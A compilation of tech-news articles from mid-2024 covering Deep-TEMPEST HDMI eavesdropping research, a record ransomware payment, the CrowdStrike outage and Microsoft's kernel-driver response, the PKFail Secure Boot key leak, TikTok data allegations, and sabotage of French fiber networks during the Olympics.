According to the paper, it’s possible to train an AI model to interpret the tiny fluctuations in electromagnetic energy from the wired HDMI signal. Even though it’s a wired standard and it’s usually encrypted digitally, there’s enough electromagnetic signal coming off of these cables to detect without direct access.

Detecting and decoding are two different things, of course. But the researchers also found that using an AI model paired to text recognition software, it’s possible to “read” the wirelessly recorded EM radiation with up to 70 percent accuracy.

Though that’s a long way from a conventional recording, it’s still a 60 percent improvement over previous methods—and it’s more than enough to steal passwords and other sensitive information. It’s even possible to do wirelessly without physical access to a target computer, even from the outside of a building under ideal conditions.

Skimming off wireless electromagnetic signals for surveillance isn’t a new idea. It’s a vulnerability referred to as TEMPEST (Transient ElectroMagnetic Pulse Emanation STandard, a very awkward backronym) with roots in espionage going all the way back to World War II. But as a digital transmission with at least some level of encryption using the HDCP system, HDMI cables weren’t thought to be particularly susceptible to it. The researcher’s AI algorithm-assisted method of attack (which they’re calling “Deep-TEMPEST”) opens up some very disturbing possibilities.

The researchers claim that this system, or functionally identical alternatives, are already being used by state-level spies and industrial espionage agents. The sophisticated nature of the technique and the need to be at least somewhere in the vicinity of the target system means that it’s unlikely to affect regular users. But any government agency or large company with sensitive data should be wary and might want to look into EM-shielding measures—and that goes double for any of their employees who work from home.

Source

The terms of the settlement, disclosed on Tuesday, mark the largest accord ever by any single state, according to the lawyers for Texas, whose legal team included the plaintiffs firm Keller Postman.

The lawsuit, filed in 2022, was the first major case to be brought under Texas' 2009 biometric privacy law, according to law firms tracking the litigation. A provision of the law provides damages of up to $25,000 per violation.

Texas accused Facebook of capturing biometric information "billions of times" from photos and videos that users uploaded to the social media platform as part of a free, discontinued feature called "Tag Suggestions."

A spokesperson for Meta said the company is pleased to resolve the matter and looks forward to "exploring future opportunities to deepen our business investments in Texas, including potentially developing data centers."

It has continued to deny any wrongdoing.

Texas Attorney General Ken Paxton in a statement said the settlement marks the state’s "commitment to standing up to the world’s biggest technology companies and holding them accountable for breaking the law and violating Texans’ privacy rights."

Texas and Meta said they reached an accord in May, weeks before the start of a trial in state court was scheduled to begin.

Meta separately agreed to pay $650 million in 2020 to settle a biometric privacy class action that was brought under an Illinois privacy law that is considered one of the nation's most stringent. The company also denied wrongdoing.

Alphabet’s Google separately is fighting a lawsuit by Texas accusing the company of violating the state’s biometric law.

Source

A major company made a staggering $75 million ransomware payment to hackers earlier this year, according to cybersecurity vendor Zscaler.

Zscaler made the claim in a Tuesday report examining the latest trends in ransomware attacks, which continue to ensnare companies, hospitals, and schools across the country.

In a tweet, Zscaler said the unnamed “Fortune 50 company” made the $75 million payment to a lesser known ransomware group called Dark Angels. “The payment is the single largest ransomware-related transaction ever reported,” the cybersecurity vendor added.

Chainanalysis, a cryptocurrency tracking firm, also confirmed to PCMag it spotted the $75 million payment to Dark Angels as well.

The previous ransomware record holder goes to insurance provider CNA, which reportedly paid $40 million to a hacking group known as Phoenix in 2021.

Compared to other ransomware groups, Dark Angels stands out by usually focusing on a "single large company at a time,” and demanding a high sum, Zscaler says. “This is in stark contrast to most ransomware groups, which target victims indiscriminately and outsource most of the attack to affiliate networks."

As an example, Zscaler said it tracked Dark Angels in September 2023 breaching an “international conglomerate that provides solutions for building automation systems, among other services.” Dark Angels stole 27TB of corporate information while encrypting the company’s VMware ESXi virtual machines. The group then demanded a $51 million ransom.

“The Dark Angels ransomware group’s strategy of targeting a small number of high-value companies for large payouts is a trend worth monitoring,” according to Zscaler, which says its "ThreatLabz predicts that other ransomware groups will take note of Dark Angels’ success and may adopt similar tactics.”

The US remains a top target for ransomware hackers. The number of ransomware attacks in the country this year have doubled so far to 1,821, up from 902 in 2023. The company published the findings as others, such as Chainalysis, report that the ransomware scourge continues to grow, despite law enforcement efforts to crack down.

Source

In a blog post published on Friday, David Weston, vice president, enterprise and OS security at Microsoft, outlined the causes of the global incident which saw millions of devices running CrowdStrike Falcon on Windows crash.

According to Microsoft's kernel-crash dump analyses, the root cause of the outage was a memory safety issue, specifically a read out-of-bounds access violation in CrowdStrike's CSagent.sys driver, a module designed to detect suspicious activity.

CSagent.sys is a file system filter driver operating at kernel level that receives notifications about file operations, such as creation or modification.

File system filters are also used to detect when security solutions are attempting to monitor the behaviour of the system.

The fateful CrowdStrike update contained a change to the sensor that allowed the filter driver to be called when file-based activity was detected. This was intended to enhance malware detection capabilities. However the faulty update cause it to try to access a memory address for which it did not have permissions, and Falcon was unable to handle the error gracefully, causing the Windows kernel to crash and enter a bootloop.

Microsoft's analysis of the cause of the crash concurs with CrowdStrike's preliminary review, released last week.

CrowdStrike Falcon loads four modules into the Windows kernel. A question on the lips of many security professions and admins tasked with cleaning up the mess, is why that is necessary at all. Why could they not run in user mode, where any glitches would be far less damaging?

They also wondered whether Microsoft's security checks might be at fault.

The main reasons for running drivers in kernel mode are twofold, according to Weston.

First, it allows security vendors to monitor what's happening in the core of the operating system itself: "Kernel drivers allow for system wide visibility, and the capability to load in early boot to detect threats like boot kits and root kits which can load before user-mode applications," he wrote.

Second, it provides for tamper resistance: "Security products want to ensure that their software cannot be disabled by malware, targeted attacks, or malicious insiders, even when those attackers have admin-level privileges."

CrowdStrike has taken full responsibility for the error, which took down more than 8.5 million Windows devices, saying it was due to a bug in its Content Validator, the system that is supposed to detect faulty code in an update.

However, the incident does put question mark over whether operating systems that allow third-party software to run in kernel mode should have more stringent checks in place.

Microsoft's blog does not address this directly. It says it engages with third-party security vendors through the Microsoft Virus Initiative (MVI) to share data and best practices, and that it provides runtime protection, such as Patch Guard, to prevent disruptive behaviour from kernel drivers.

In addition, drivers must pass a series of tests by Microsoft Windows Hardware Quality Labs (WHQL) to be certified - although this does not cover updates.

In his blog post, Weston advised security software vendors to minimise their use of sensors in kernel mode for data collection and enforcement, and to isolate the majority of key product functionality in user mode, where additional protections such as Virtualisation-based Security (VBS) Enclaves and Protected Processes and Event Tracing for Windows (ETW) are available.

Customers are advised to make use of security features integrated into Windows.

"Windows is constantly increasing security defaults, including dozens of new security features enabled by default in Windows 11," Weston wrote.

He added that Microsoft plans to work with the third-party vendors security software vendors to help them take advantage of these integrated features.

CrowdStrike is used predominantly by large corporations and public sector organisations. It is estimated that the global outage CrowdStrike outage will cost Fortune 500 companies around $44 million each, on average.

However, a CISO told Computing that the company is "the best at what it does," and predicted its long-term survival, in spite of causing the largest IT outage in history.

Source

Microsoft has admitted that its estimate of 8.5 million machines crashed by CrowdStrike's faulty software update was almost certainly too low, and vowed to reduce infosec vendors' reliance on the kernel drivers at the heart of the issue.

Redmond posted an incident response blog on Saturday – titled "Windows Security best practices for integrating and managing security tools" – in which veep for enterprise and OS security David Weston explained how Microsoft measured the impact of the incident: by accessing crash reports shared by customers.

But of course, as Weston noted, not every Windows customer shares crash reports.

"It's worth noting the number of devices which generated crash reports is a subset of the number of impacted devices previously shared by Microsoft," he wrote. Which means the 8.5 million crashed machine estimate Redmond shared on July 20 for over a week was not entirely accurate. It was also advantageous to Microsoft, which was criticized for the fragility of its OS in the wake of the incident – especially in mainstream media, which often identified crashes caused by CrowdStrike as a Microsoft mess.

Weston's post justifies how Windows performed, on the grounds that kernel drivers like those employed by CrowdStrike can improve performance and prevent tampering with software in ways that enhance security.

He noted, however, that infosec vendors must rationalize those benefits against potential negative impacts on resilience.

"Since kernel drivers run at the most trusted level of Windows, where containment and recovery capabilities are by nature constrained, security vendors must carefully balance needs like visibility and tamper resistance with the risk of operating within kernel mode," he wrote.

Weston observed that security vendors can find the right balance.

"For example, security vendors can use minimal sensors that run in kernel mode for data collection and enforcement, limiting exposure to availability issues," he wrote. "The remainder of the key product functionality includes managing updates, parsing content, and other operations can occur isolated within user mode where recoverability is possible."

That arrangement, he suggested, "demonstrates the best practice of minimizing kernel usage while still maintaining a robust security posture and strong visibility."

Are you taking notes, CrowdStrike?

Weston also reminded readers that Redmond runs an industry forum called the Microsoft Virus Initiative (MVI) in which security vendors and the OS giant work together to "define reliable extension points and platform improvements, as well as share information about how to best protect our customers."

The Microsoft veep listed the many security-related enhancements Microsoft has made over the years, and revealed the software megalith now plans "to work with the anti-malware ecosystem to take advantage of these integrated features to modernize their approach, helping to support and even increase security along with reliability."

That work will involve four efforts, namely:

1. Providing safe rollout guidance, best practices, and technologies to make it safer to perform updates to security products;
2. Reducing the need for kernel drivers to access important security data;
3. Providing enhanced isolation and anti-tampering capabilities with technologies like recently announced VBS enclaves;
4. Enabling zero trust approaches like high integrity attestation which provides a method to determine the security state of the machine based on the health of Windows native security features.

Point two seems aimed at ensuring a CrowdStrike-like event becomes less likely in future.

Weston didn't explain how that reduced dependence will be delivered – some re-jigging of Windows will likely be needed to make it happen.

Microsoft and Windows have a long and inglorious history of security snafus. If Redmond's changes go awry, it won't have CrowdStrike to blame for any new problems. ®

Source

The US Department of Justice has alleged that TikTok shipped personal information to China and allowed profiling of the short video app's users based on their attitudes to some ticklish topics.

The Department's views emerged in a filing [PDF] from the US government in response to attempts by TikTok and its parent company ByteDance to strike down laws that force a sale of the platform's stateside operations – and closure if that can't be arranged.

The filing details an internal tool called Lark that TikTok staff use for internal communications. The DoJ alleges "significant amounts of restricted US user data (including but not limited to personally identifiable information)" was shared over Lark.

"This resulted in certain sensitive US person data being contained in Lark channels and, therefore, stored on Chinese servers and accessible to ByteDance employees located in China," the filing asserts.

It gets worse: the filing claims "Lark contained multiple internal search tools that had been developed and run by China-based ByteDance engineers for scraping TikTok user data, including US user data."

Those tools allowed collection of "bulk user information based on the user's content or expressions, including views on gun control, abortion, and religion." The results of those efforts could be viewed in China.

The filing also alleges that TikTok tools allow for "triggering of the suppression of content on the platform based on the user's use of certain words. Although this tool contained certain policies that only applied to users based in China, others such policies may have been used to apply to TikTok users outside of China."

It's not hard to imagine how that tool could supress anti-Beijing comment, or in concert with the profiling tool help to target campaigns to interested audiences.

The Oracle angle

The filing also makes many mentions of Oracle and the database giant's efforts to become ByteDance's US-based technology partner under a "national security agreement" (NSA) that would ideally have TikTok operate under strict conditions. Big Red offered to segment TikTok data so it could identify matter describing US-based users, segment it, and store it stateside.

The filing states that the US government didn't find that offer adequate, as it "contemplated extensive data flows of US users back to ByteDance and thus to China and because the agreement sought to maintain extensive engagement between TikTok's US operations and the leadership at ByteDance."

A potential role for Oracle as an overseer of TikTok's source code was also rejected, on grounds that the sheer volume of the codebase – two billion lines as of 2022 – meant that a review would require at least three years of work on the code used at that time.

"But the source code is not static," the filing states. "ByteDance regularly updates it to add and modify TikTok's features. Even with Oracle's considerable resources, perfect review would be an impossibility."

The filing contains details that suggest Oracle may have been better off not getting the gig as TikTok's stateside host, observing that Big Red "would be required to sift through such data, using both untested and experimental tools to try to ascertain whether information was routed for legitimate commercial reasons or nefarious reasons at the request of PRC actors."

The DoJ asserted that Oracle, and other tech providers, just couldn't ever know if they had enough info to do the job right.

"Private parties also lack insight into ByteDance's communications with PRC officials, ByteDance's use of US user data, and ByteDance's other TikTok-related activities," the filing argues. US authorities thus "determined that the Final Proposed NSA presented too great a risk because the trusted technology provider and other monitors faced massive scope and scale hurdles that could not be overcome."

The arguments outlined above will be argued in court on September 16. As may even juicier allegations, as substantial chunks of the filing are redacted.

TikTok used its X account to reject the US action against it.

"Nothing in this brief changes the fact that the Constitution is on our side," the outfit Xeeted. "Today, once again, the government is taking this unprecedented step while hiding behind secret information. We remain confident we will prevail in court." ®

Source

Infosec in brief Protecting computers' BIOS and the boot process is essential for modern security – but knowing it's important isn't the same as actually taking steps to do it.

For instance, take the research published last week by security boffins at firmware security vendor Binarily. The researchers found hundreds of PCs sold by Dell, Acer, Fujitsu, Gigabyte, HP, Lenovo and Supermicro – and components sold by Intel – using what appears to be a 12-year old test platform key (PK) leaked in 2022 to protect their UEFI Secure Boot implementations.

"An attacker with access to the private part of the PK can easily bypass Secure Boot by manipulating the Key Exchange Key database, the Signature Database, and the Forbidden Signature Database," Binarily's boffins wrote.

And it's not like the manufacturers using the offending PK didn't have reason to know it was untrusted and not intended for use outside the lab: It said so right on the package.

"These test keys have strong indications of being untrusted," Binarily noted. "For example, the certificate issuer contains the 'DO NOT TRUST' or 'DO NOT SHIP' strings."

According to Binarily, more than ten percent of the firmware images in its dataset are vulnerable to exploitation with the untrusted PK – which was issued by American Megatrends International, possibly as early as May 2012. The researchers observed that makes this issue "one of the longest-lasting [supply chain vulnerabilities] of its kind."

If an attacker were to leverage the PK in an attack, they could run untrusted code during the boot process, even with Secure Boot enabled.

"This compromises the entire security chain, from firmware to the operating system," Binarily added.

Binarily has released a free scanning tool to check systems for vulnerability to what it calls "PKFail". Running it seems a sensible action. As for fixing this issue, device manufacturers will need to step up.

Another stalkerware vendor breached

It seems we can barely go two weeks without another stalkerware vendor being breached, but here we are. TechCrunch was handed a bunch of files stolen from Minnesota-based SpyTech last week.

The files – which were reportedly verified as authentic – were installed on phones, tablets and computers monitored by SpyTech software, which covertly monitors machines to snoop on what their users are doing. Data belonging to more than 10,000 devices was found going back to 2013.

Funnily enough, the CEO of SpyTech reportedly wasn't aware of the breach when asked about it – which just goes to show you these shops are more about making money than protecting the private data they scoop up on behalf of customers.

… And turn on MFA while you're at it

Security researchers at Cisco Talos released their quarterly report on incident response trends last week, and one startling trend stands out: Around 80 percent of ransomware engagements in Q2 occurred at organizations whose systems didn't employ multifactor authentication.

And here we thought Snowflake might have taught the world something.

Compromised credentials have been the most popular way of gaining initial access for the third quarter in a row, Talos noted – just like what caused all those Snowflake failures.

Ransomware engagements as a whole were up 22 percent from the first to second quarter, accounting for 30 percent of all incidents to which Talos responded. Combined with the rise in attacks using stolen credentials and relying on a lack of MFA, maybe it'd be a good idea to spend some time this week enabling it for everyone – no exceptions.

TracFone fined $16 million for trio of breaches

Verizon subsidiary TracFone has agreed to pay the FCC $16 million to end investigations into a trio of data breaches the outfit experienced between 2021 and 2023.

According to the FCC, TracFone failed to secure several of its customer database APIs, resulting in criminals stealing customer account and device information, as well as personally identifiable info. The breaches resulted in "numerous unauthorized port-outs."

Not to be confused with SIM swaps – another scam most carriers are abysmal at preventing – port outs involve transferring a number to a different carrier entirely. Both give attackers control over customer devices.

TracFone has been ordered to implement mandatory cyber security programs "with novel provisions to reduce API vulnerabilities," as well as SIM swap and port out protections. ®

Source

Facepalm: If you found yourself unable to access your passwords saved to Chrome last week, don't worry: you weren't alone. Google has apologized for a bug that resulted in around 15 million Windows users being unable to find or save their credentials for almost 18 hours.

The Google Password Manager is used by many of Chrome's 3 billion global users, storing passwords and usernames that can automatically fill the fields in corresponding websites. But millions of people found they could no longer find or save passwords stored in the manager for almost 18 hours starting on July 24.

Google says in its incident report that the root cause of the issue was a change in product behavior without proper feature guard.

The issue was limited to the M127 version of Chrome on Windows. According to Google, 25% of Chrome's 3 billion users saw the configuration change when it was rolled out, which is around 750 million people. Of that number, about 2% experienced the password manager issue, which meant around 15 million people lost access to their passwords.

Google did provide an interim workaround during the incident that involved launching Chrome with a command line flag: – enable-features=SkipUndecryptablePasswords.

A fix was eventually rolled out that just required users to restart the browser. Google says the issue was mitigated for all affected users as of July 27 at 09:27 AM PT.

Google has now apologized for any inconvenience the service disruption may have caused. Chrome users who have experienced issues not mentioned in its incident report should contact Google Workspace Support.

Any issue that impacts 15 million people is a major one. It comes at a bad time for Windows, given that millions of businesses around the world were thrown into chaos after CrowdStrike's update resulted in a Blue Screen of Death boot loop. It's estimated that around 8.5 million PCs were impacted, and it led to Microsoft working on changes to the operating system's security, including making it significantly more difficult for companies to access the Windows kernel.

Source

Organizers for the Paris Games say their operations were not affected. France’s second largest telecommunications company said it had made repairs in several areas already or workarounds kept the scale of the impact low. Other companies were working on fixes.

The vandalism came after arson attacks hit train networks around France on Friday, hours before the Olympics opening ceremony.

Marina Ferrari, secretary of state in charge of digital affairs, posted on X that damage in several regions overnight Sunday to Monday affected telecommunications operators. She said that led to local impact on access to fiber lines and fixed and mobile telephone lines.

A French police official said there were issues in at least six of the country’s administrative departments, which include the region around the Mediterranean city of Marseille, hosting Olympic soccer and sailing competitions.

Paris 2024 organizers said they have been informed of acts of sabotage on fiber optic networks across several French departments but “we can only confirm that there is no impact on our operations.”

SFR, France’s second-largest telecommunications company, said its long-distance network “was the target of acts of vandalism at five points in five departments between 1 a.m. and 3 a.m.”

“Maintenance teams are on site to carry out repair work,” SFR said in a statement. It added that the impact of the vandalism acts on its customers was “very low because there are sufficient backups and workarounds.”

Up to eight French and international operators, who use SFR’s infrastructure, have been affected, the company also said, adding that full service has already been restored by Monday afternoon in several areas.

Telecom operators Bouygues and Free confirmed they were affected. The parent company of Free said its teams are mobilized to restore services.

Free said in a statement that an “incident effecting multiple networks is in progress in 11 departments,” including in Marseille. “All our teams have been mobilized to resolve the situation.”

A national investigation is underway into last week’s train sabotage, which disrupted travel for nearly a million passengers in France as well as people in London and in other neighboring countries. Train traffic had largely resumed by Monday.

French media reported that an extreme-left activist was arrested at a rail facility on Sunday in the Seine-Maritime region of western France. But the Paris prosecutor’s office said it was unconnected to what happened Friday and that no one has been arrested so far in the national investigation into the arson attacks.

Source

Also:  Overnight fiber optic sabotage disrupts telecommunications in several French regions — Paris and the Olympic Games unaffected.